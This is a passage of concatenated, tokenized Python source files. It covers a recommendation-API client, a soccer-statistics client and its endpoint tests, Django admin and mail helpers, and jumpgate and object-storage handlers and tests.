assoc_type , <EOL> '<STR_LIT>' : requested_item_type <EOL> } <EOL> return self . _get_item_based_recommendation ( '<STR_LIT>' , ** kwargs ) <EOL> def _get_item_based_recommendation ( self , recommendation_type , ** kwargs ) : <EOL> options = { <EOL> '<STR_LIT>' : self . _api_key , <EOL> '<STR_LIT>' : self . _tenant , <EOL> '<STR_LIT>' : kwargs [ '<STR_LIT>' ] , <EOL> } <EOL> if kwargs . get ( '<STR_LIT>' ) : <EOL> options [ '<STR_LIT>' ] = kwargs [ '<STR_LIT>' ] <EOL> if kwargs . get ( '<STR_LIT>' ) : <EOL> options [ '<STR_LIT>' ] = kwargs [ '<STR_LIT>' ] <EOL> if kwargs . get ( '<STR_LIT>' ) : <EOL> options [ '<STR_LIT>' ] = self . _get_item_type ( kwargs [ '<STR_LIT>' ] ) <EOL> if kwargs . get ( '<STR_LIT>' ) : <EOL> options [ '<STR_LIT>' ] = self . _get_item_type ( <EOL> kwargs [ '<STR_LIT>' ] <EOL> ) <EOL> if kwargs . 
get ( '<STR_LIT>' ) : <EOL> options [ '<STR_LIT>' ] = kwargs [ '<STR_LIT>' ] <EOL> url = self . _build_url ( recommendation_type ) <EOL> recommendations = self . _fetch_response ( url , params = options ) <EOL> return self . _recommendations_to_products ( recommendations ) <EOL> def get_most_viewed_items ( self , time_range = None , max_results = None , <EOL> requested_item_type = None ) : <EOL> kwargs = { <EOL> '<STR_LIT>' : time_range , <EOL> '<STR_LIT>' : max_results , <EOL> '<STR_LIT>' : requested_item_type <EOL> } <EOL> return self . _get_community_rankings ( '<STR_LIT>' , ** kwargs ) <EOL> def get_most_bought_items ( self , time_range = None , max_results = None , <EOL> requested_item_type = None ) : <EOL> kwargs = { <EOL> '<STR_LIT>' : time_range , <EOL> '<STR_LIT>' : max_results , <EOL> '<STR_LIT>' : requested_item_type <EOL> } <EOL> return self . _get_community_rankings ( '<STR_LIT>' , ** kwargs ) <EOL> def get_most_rated_items ( self , time_range = None , max_results = None , <EOL> requested_item_type = None ) : <EOL> kwargs = { <EOL> '<STR_LIT>' : time_range , <EOL> '<STR_LIT>' : max_results , <EOL> '<STR_LIT>' : requested_item_type <EOL> } <EOL> return self . _get_community_rankings ( '<STR_LIT>' , ** kwargs ) <EOL> def get_best_rated_items ( self , time_range = None , max_results = None , <EOL> requested_item_type = None ) : <EOL> kwargs = { <EOL> '<STR_LIT>' : time_range , <EOL> '<STR_LIT>' : max_results , <EOL> '<STR_LIT>' : requested_item_type <EOL> } <EOL> return self . _get_community_rankings ( '<STR_LIT>' , ** kwargs ) <EOL> def get_worst_rated_items ( self , time_range = None , max_results = None , <EOL> requested_item_type = None ) : <EOL> kwargs = { <EOL> '<STR_LIT>' : time_range , <EOL> '<STR_LIT>' : max_results , <EOL> '<STR_LIT>' : requested_item_type <EOL> } <EOL> return self . 
_get_community_rankings ( '<STR_LIT>' , ** kwargs ) <EOL> def _get_community_rankings ( self , ranking_type , ** kwargs ) : <EOL> options = { <EOL> '<STR_LIT>' : self . _api_key , <EOL> '<STR_LIT>' : self . _tenant , <EOL> } <EOL> if kwargs . get ( '<STR_LIT>' ) : <EOL> options [ '<STR_LIT>' ] = kwargs [ '<STR_LIT>' ] <EOL> if kwargs . get ( '<STR_LIT>' ) : <EOL> options [ '<STR_LIT>' ] = self . _get_item_type ( <EOL> kwargs [ '<STR_LIT>' ] <EOL> ) <EOL> if kwargs . get ( '<STR_LIT>' ) : <EOL> options [ '<STR_LIT>' ] = self . _get_time_range ( <EOL> kwargs [ '<STR_LIT>' ] <EOL> ) <EOL> url = self . _build_url ( ranking_type ) <EOL> recommendations = self . _fetch_response ( url , params = options ) <EOL> return self . _recommendations_to_products ( recommendations ) <EOL> def get_item_types ( self ) : <EOL> if hasattr ( self , "<STR_LIT>" ) : <EOL> return self . _item_types <EOL> url = self . _build_url ( '<STR_LIT>' ) <EOL> options = { <EOL> '<STR_LIT>' : self . _api_key , <EOL> '<STR_LIT>' : self . _tenant <EOL> } <EOL> try : <EOL> response = self . _fetch_response ( url , params = options ) <EOL> except : <EOL> return [ '<STR_LIT>' , ] <EOL> try : <EOL> self . _item_types = response [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> return self . _item_types <EOL> except KeyError : <EOL> return [ '<STR_LIT>' , ] <EOL> def _get_item_type ( self , item_type ) : <EOL> item_type = item_type . upper ( ) <EOL> if item_type in self . get_item_types ( ) : <EOL> return item_type <EOL> return self . _default_item_type <EOL> def _get_time_range ( self , time_range ) : <EOL> time_range = time_range . upper ( ) <EOL> if time_range in TIME_RANGES : <EOL> return time_range <EOL> return self . _default_time_range <EOL> def _build_url ( self , path ) : <EOL> if path . startswith ( '<STR_LIT:/>' ) : <EOL> path = path [ <NUM_LIT:1> : ] <EOL> if path . endswith ( '<STR_LIT:/>' ) : <EOL> path = path [ : - <NUM_LIT:1> ] <EOL> url = "<STR_LIT>" % ( self . 
_endpoint , path ) <EOL> return url <EOL> def _fetch_response ( self , url , method = "<STR_LIT:GET>" , params = None ) : <EOL> func = { <EOL> '<STR_LIT:GET>' : self . _requests . get , <EOL> '<STR_LIT:POST>' : self . _requests . post <EOL> } . get ( method , self . _requests . get ) <EOL> logger . debug ( "<STR_LIT>" % ( method , url , params ) ) <EOL> response = func ( url , params = params ) <EOL> logger . debug ( "<STR_LIT>" % ( <EOL> response . status_code , <EOL> response . text <EOL> ) ) <EOL> response . raise_for_status ( ) <EOL> content = response . json ( ) <EOL> self . check_response_for_errors ( content ) <EOL> return content <EOL> def _recommendations_to_products ( self , recommendations ) : <EOL> recommendeditems = recommendations . get ( '<STR_LIT>' ) <EOL> if not recommendeditems : <EOL> return [ ] <EOL> items = recommendeditems . get ( '<STR_LIT>' ) <EOL> if not items : <EOL> return [ ] <EOL> if "<STR_LIT:id>" in items : <EOL> items = [ items ] <EOL> url_map = { } <EOL> upcs = [ ] <EOL> for item in items : <EOL> upc = item . get ( '<STR_LIT:id>' ) <EOL> upcs . append ( upc ) <EOL> url_map [ upc ] = item . get ( '<STR_LIT:url>' ) <EOL> Product = get_model ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> products = Product . browsable . filter ( upc__in = upcs ) <EOL> results = [ ] <EOL> for product in products : <EOL> results . append ( { <EOL> "<STR_LIT>" : product , <EOL> "<STR_LIT>" : url_map . get ( product . upc ) <EOL> } ) <EOL> return results <EOL> def check_response_for_errors ( self , json ) : <EOL> if json . get ( '<STR_LIT:error>' , False ) : <EOL> raise EasyRecException ( json [ '<STR_LIT:error>' ] ) <EOL> class DummyResponse ( object ) : <EOL> def __init__ ( self , response = { } ) : <EOL> self . response = response <EOL> def json ( self ) : <EOL> return self . response <EOL> def raise_for_status ( self ) : <EOL> pass <EOL> class DummyRequests ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , response = { } ) : <EOL> self . 
response = response <EOL> def get ( self , * args , ** kwargs ) : <EOL> return DummyResponse ( self . response ) <EOL> def post ( self , * args , ** kwargs ) : <EOL> return DummyResponse ( self . response ) </s>
<s> import sys <EOL> from soccermetrics . rest import SoccermetricsRestClient <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> client = SoccermetricsRestClient ( ) <EOL> if len ( sys . argv ) != <NUM_LIT:3> : <EOL> sys . stderr . write ( "<STR_LIT>" % sys . argv [ <NUM_LIT:0> ] ) <EOL> raise SystemExit ( <NUM_LIT:1> ) <EOL> matchday_start = int ( sys . argv [ <NUM_LIT:1> ] ) <EOL> matchday_end = int ( sys . argv [ <NUM_LIT:2> ] ) <EOL> for day in range ( matchday_start , matchday_end + <NUM_LIT:1> ) : <EOL> matches = client . club . information . get ( matchday = day , <EOL> sort = '<STR_LIT>' ) . all ( ) <EOL> for match in matches : <EOL> print "<STR_LIT>" % ( match . matchday , <EOL> match . matchDate , match . kickoffTime , match . homeTeamName , <EOL> match . awayTeamName , match . venueName , match . refereeName ) <EOL> print </s>
import unittest
from soccermetrics.rest import SoccermetricsRestClient


class ClientEndpointTest(unittest.TestCase):
    """Verify that each client resource maps to its expected endpoint URI.

    No HTTP requests are issued: only the locally constructed endpoint
    strings are inspected.
    """

    def setUp(self):
        # Dummy credentials are sufficient — endpoints are built locally.
        self.client = SoccermetricsRestClient(account="<STR_LIT>", api_key="<STR_LIT>")

    def test_service_root(self):
        """Service root endpoint."""
        self.assertEqual(self.client.root.endpoint, "<STR_LIT>")

    def test_validation_endpoints(self):
        """Validation (lookup-table) resource endpoints."""
        self.assertEqual(self.client.validation.phases.endpoint, "<STR_LIT>")
        self.assertEqual(self.client.validation.groupRounds.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.validation.knockoutRounds.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.validation.confederations.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.validation.countries.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.validation.competitions.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.validation.domesticCompetitions.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.validation.intlCompetitions.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.validation.seasons.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.validation.teams.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.validation.venues.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.validation.timezones.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.validation.nameOrder.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.validation.persons.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.validation.positions.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.validation.fouls.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.validation.cards.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.validation.bodyparts.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.validation.shotevents.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.validation.penaltyOutcomes.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.validation.actions.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.validation.modifiers.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.validation.modifierCategories.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.validation.weather.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.validation.surfaces.endpoint, '<STR_LIT>')

    def test_personnel_endpoints(self):
        """Personnel resource endpoints (players, managers, referees)."""
        self.assertEqual(self.client.players.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.managers.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.referees.endpoint, '<STR_LIT>')

    def test_club_match_endpoints(self):
        """Club match resource URIs."""
        self.assertEqual(self.client.club.information.EndpointURI(), '<STR_LIT>')
        self.assertEqual(self.client.club.lineups.EndpointURI(), '<STR_LIT>')
        self.assertEqual(self.client.club.conditions.EndpointURI(), '<STR_LIT>')
        self.assertEqual(self.client.club.goals.EndpointURI(), '<STR_LIT>')
        self.assertEqual(self.client.club.penalties.EndpointURI(), '<STR_LIT>')
        self.assertEqual(self.client.club.offenses.EndpointURI(), '<STR_LIT>')
        self.assertEqual(self.client.club.substitutions.EndpointURI(), '<STR_LIT>')
        self.assertEqual(self.client.club.shootouts.EndpointURI(), '<STR_LIT>')

    def test_national_team_match_endpoints(self):
        """National-team match resource URIs."""
        self.assertEqual(self.client.natl.information.EndpointURI(), '<STR_LIT>')
        self.assertEqual(self.client.natl.lineups.EndpointURI(), '<STR_LIT>')
        self.assertEqual(self.client.natl.conditions.EndpointURI(), '<STR_LIT>')
        self.assertEqual(self.client.natl.goals.EndpointURI(), '<STR_LIT>')
        self.assertEqual(self.client.natl.penalties.EndpointURI(), '<STR_LIT>')
        self.assertEqual(self.client.natl.offenses.EndpointURI(), '<STR_LIT>')
        self.assertEqual(self.client.natl.substitutions.EndpointURI(), '<STR_LIT>')
        self.assertEqual(self.client.natl.shootouts.EndpointURI(), '<STR_LIT>')

    def test_club_events_endpoints(self):
        """Club match-event resource endpoints."""
        self.assertEqual(self.client.club.events.all.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.club.events.touches.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.club.events.actions.endpoint, '<STR_LIT>')

    def test_natl_events_endpoints(self):
        """National-team match-event resource endpoints."""
        self.assertEqual(self.client.natl.events.all.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.natl.events.touches.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.natl.events.actions.endpoint, '<STR_LIT>')

    def test_club_statistics_endpoints(self):
        """Club match-statistics resource endpoints."""
        self.assertEqual(self.client.club.stats.crosses.corners.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.club.stats.crosses.totals.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.club.stats.defense.actions.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.club.stats.defense.blocks.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.club.stats.defense.clearances.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.club.stats.defense.goalline.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.club.stats.defense.tackles.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.club.stats.fouls.cards.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.club.stats.fouls.wins.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.club.stats.goals.assists.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.club.stats.goals.bodyparts.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.club.stats.goals.locations.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.club.stats.goals.penalties.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.club.stats.goals.totals.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.club.stats.goalkeeper.actions.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.club.stats.goalkeeper.goals.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.club.stats.goalkeeper.shots.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.club.stats.goalkeeper.saves.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.club.stats.passes.directions.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.club.stats.passes.lengths.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.club.stats.passes.locations.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.club.stats.passes.totals.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.club.stats.setpieces.corners.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.club.stats.setpieces.freekicks.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.club.stats.setpieces.throwins.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.club.stats.shots.bodyparts.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.club.stats.shots.locations.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.club.stats.shots.plays.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.club.stats.shots.totals.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.club.stats.touches.duels.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.club.stats.touches.locations.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.club.stats.touches.totals.endpoint, '<STR_LIT>')

    def test_natl_statistics_endpoints(self):
        """National-team match-statistics resource endpoints."""
        self.assertEqual(self.client.natl.stats.crosses.corners.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.natl.stats.crosses.totals.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.natl.stats.defense.actions.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.natl.stats.defense.blocks.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.natl.stats.defense.clearances.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.natl.stats.defense.goalline.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.natl.stats.defense.tackles.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.natl.stats.fouls.cards.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.natl.stats.fouls.wins.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.natl.stats.goals.assists.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.natl.stats.goals.bodyparts.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.natl.stats.goals.locations.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.natl.stats.goals.penalties.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.natl.stats.goals.totals.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.natl.stats.goalkeeper.actions.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.natl.stats.goalkeeper.goals.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.natl.stats.goalkeeper.shots.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.natl.stats.goalkeeper.saves.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.natl.stats.passes.directions.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.natl.stats.passes.lengths.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.natl.stats.passes.locations.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.natl.stats.passes.totals.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.natl.stats.setpieces.corners.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.natl.stats.setpieces.freekicks.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.natl.stats.setpieces.throwins.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.natl.stats.shots.bodyparts.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.natl.stats.shots.locations.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.natl.stats.shots.plays.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.natl.stats.shots.totals.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.natl.stats.touches.duels.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.natl.stats.touches.locations.endpoint, '<STR_LIT>')
        self.assertEqual(self.client.natl.stats.touches.totals.endpoint, '<STR_LIT>')

    def test_analytics_endpoints(self):
        """Match analytics resource URIs."""
        self.assertEqual(self.client.analytics.state.EndpointURI(), '<STR_LIT>')
        self.assertEqual(self.client.analytics.segment.EndpointURI(), '<STR_LIT>')
        self.assertEqual(self.client.analytics.tsr.EndpointURI(), '<STR_LIT>')
<s> from django . contrib import admin <EOL> from django . core . mail import get_connection <EOL> from . models import Member <EOL> from . . storage . models import Package <EOL> class PackageInline ( admin . TabularInline ) : <EOL> model = Package <EOL> max_num = <NUM_LIT:1> <EOL> class MemberAdmin ( admin . ModelAdmin ) : <EOL> list_display = ( <EOL> '<STR_LIT:email>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , ) <EOL> list_filter = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , ) <EOL> search_fields = ( '<STR_LIT:id>' , '<STR_LIT:email>' , ) <EOL> actions = [ '<STR_LIT>' ] <EOL> actions_on_bottom = True <EOL> exclude = ( '<STR_LIT>' , '<STR_LIT>' , ) <EOL> inlines = [ PackageInline , ] <EOL> def resend_registration ( self , request , queryset ) : <EOL> connection = get_connection ( ) <EOL> for member in queryset . all ( ) . only ( '<STR_LIT>' , '<STR_LIT:email>' , '<STR_LIT:id>' ) : <EOL> member . send_registration_confirmation ( <EOL> reset_key = True , connection = connection ) <EOL> admin . site . register ( Member , MemberAdmin ) </s>
<s> from django . conf import settings <EOL> from django . core . mail import EmailMultiAlternatives <EOL> from django . template . loader import render_to_string <EOL> def send_custom_mail ( subject , to , template , context , connection = None ) : <EOL> context . update ( { '<STR_LIT>' : settings . SITE_URL } ) <EOL> text_content = render_to_string ( '<STR_LIT>' % template , context ) <EOL> html_content = render_to_string ( '<STR_LIT>' % template , context ) <EOL> msg = EmailMultiAlternatives ( <EOL> subject , <EOL> text_content , <EOL> settings . FROM_EMAIL , <EOL> [ to ] , <EOL> connection = connection ) <EOL> msg . attach_alternative ( html_content , "<STR_LIT>" ) <EOL> msg . send ( ) </s>
<s> from pims . api import * <EOL> from . _version import get_versions <EOL> __version__ = get_versions ( ) [ '<STR_LIT:version>' ] <EOL> del get_versions </s>
<s> def add_endpoints ( disp ) : <EOL> disp . add_endpoint ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> disp . add_endpoint ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> disp . add_endpoint ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> disp . add_endpoint ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> disp . add_endpoint ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> disp . add_endpoint ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> disp . add_endpoint ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> disp . add_endpoint ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> disp . add_endpoint ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> disp . add_endpoint ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> disp . add_endpoint ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> disp . add_endpoint ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> disp . add_endpoint ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> disp . add_endpoint ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> disp . add_endpoint ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> disp . add_endpoint ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> disp . add_endpoint ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> disp . add_endpoint ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> disp . add_endpoint ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> disp . add_endpoint ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) </s>
<s> from jumpgate . common import error_handling <EOL> EXTENSIONS = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:description>' : '''<STR_LIT>''' , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { '<STR_LIT>' : None } , <EOL> } , <EOL> } <EOL> class ExtensionsV2 ( object ) : <EOL> def on_get ( self , req , resp , tenant_id ) : <EOL> resp . body = { '<STR_LIT>' : EXTENSIONS . values ( ) } <EOL> class ExtensionV2 ( object ) : <EOL> def on_get ( self , req , resp , tenant_id , alias ) : <EOL> if alias not in EXTENSIONS : <EOL> return error_handling . not_found ( <EOL> resp , '<STR_LIT>' ) <EOL> resp . body = { '<STR_LIT>' : EXTENSIONS [ alias ] } </s>
<s> import falcon <EOL> class Versions ( object ) : <EOL> def __init__ ( self , disp ) : <EOL> self . disp = disp <EOL> def on_get ( self , req , resp ) : <EOL> resp . status = falcon . HTTP_300 <EOL> resp . body = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ <EOL> { <EOL> '<STR_LIT:id>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ <EOL> { <EOL> '<STR_LIT>' : self . disp . get_endpoint_url ( <EOL> req , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:type>' : '<STR_LIT>' <EOL> } , <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:type>' : '<STR_LIT>' <EOL> } <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT:application/json>' , <EOL> '<STR_LIT:type>' : '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> } <EOL> ] , <EOL> '<STR_LIT:status>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> { <EOL> '<STR_LIT:id>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ <EOL> { <EOL> '<STR_LIT>' : self . disp . get_endpoint_url ( <EOL> req , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:type>' : '<STR_LIT>' <EOL> } , <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:type>' : '<STR_LIT>' <EOL> } <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT:application/json>' , <EOL> '<STR_LIT:type>' : '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> } <EOL> ] , <EOL> '<STR_LIT:status>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> ] <EOL> } <EOL> } </s>
<s> from mock import MagicMock , patch <EOL> from jumpgate . compute . drivers . sl . availability_zones import ( <EOL> AvailabilityZonesV2 ) <EOL> import unittest <EOL> class TestAvailabilityZonesV2 ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . req , self . resp = MagicMock ( ) , MagicMock ( ) <EOL> self . tenant_id = '<STR_LIT>' <EOL> self . instance = AvailabilityZonesV2 ( ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_on_get ( self , mockOptions ) : <EOL> mockOptions . return_value = { <EOL> '<STR_LIT>' : <EOL> [ { '<STR_LIT>' : { '<STR_LIT>' : { '<STR_LIT:name>' : '<STR_LIT>' } } } , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : { '<STR_LIT:name>' : '<STR_LIT>' } } } , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : { '<STR_LIT:name>' : '<STR_LIT>' } } } ] } <EOL> self . instance . on_get ( self . req , self . resp , self . tenant_id ) <EOL> self . assertEquals ( list ( self . resp . body . keys ( ) ) , <EOL> [ '<STR_LIT>' ] ) <EOL> self . assertEquals ( self . resp . body [ '<STR_LIT>' ] , <EOL> [ { '<STR_LIT>' : { '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : None , '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : None , '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : None , '<STR_LIT>' : '<STR_LIT>' } ] ) <EOL> self . assertEquals ( self . resp . status , <NUM_LIT:200> ) <EOL> def tearDown ( self ) : <EOL> self . req , self . resp , self . app = None , None , None </s>
<s> try : <EOL> import unittest2 as unittest <EOL> except ImportError : <EOL> import unittest <EOL> from mock import Mock <EOL> from object_storage . storage_object import StorageObject <EOL> class ClientTest ( unittest . TestCase ) : <EOL> def test_instance_setup ( self ) : <EOL> self . assert_ ( self . client == self . obj . client , "<STR_LIT>" ) <EOL> self . assert_ ( self . obj . container == '<STR_LIT>' , "<STR_LIT>" ) <EOL> self . assert_ ( self . obj . name == '<STR_LIT>' , "<STR_LIT>" ) <EOL> def test_create ( self ) : <EOL> _make_request = Mock ( ) <EOL> self . obj . make_request = _make_request <EOL> self . obj . create ( ) <EOL> self . assertEqual ( self . obj . make_request . call_args [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] , '<STR_LIT>' ) <EOL> self . assertEqual ( self . obj . make_request . call_args [ <NUM_LIT:1> ] [ '<STR_LIT>' ] , { <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> def test_create_w_headers ( self ) : <EOL> _make_request = Mock ( ) <EOL> self . obj . make_request = _make_request <EOL> self . obj . create ( headers = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . assertEqual ( self . obj . make_request . call_args [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] , '<STR_LIT>' ) <EOL> self . assertEqual ( self . obj . make_request . call_args [ <NUM_LIT:1> ] [ '<STR_LIT>' ] , { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> def test_update ( self ) : <EOL> _make_request = Mock ( ) <EOL> self . obj . make_request = _make_request <EOL> self . obj . update ( { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . assertEqual ( self . obj . make_request . call_args [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] , '<STR_LIT:POST>' ) <EOL> self . assertEqual ( <EOL> self . obj . make_request . call_args [ <NUM_LIT:1> ] [ '<STR_LIT>' ] , <EOL> { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> def test_delete ( self ) : <EOL> self . client . delete ( ) <EOL> self . client . delete_object . 
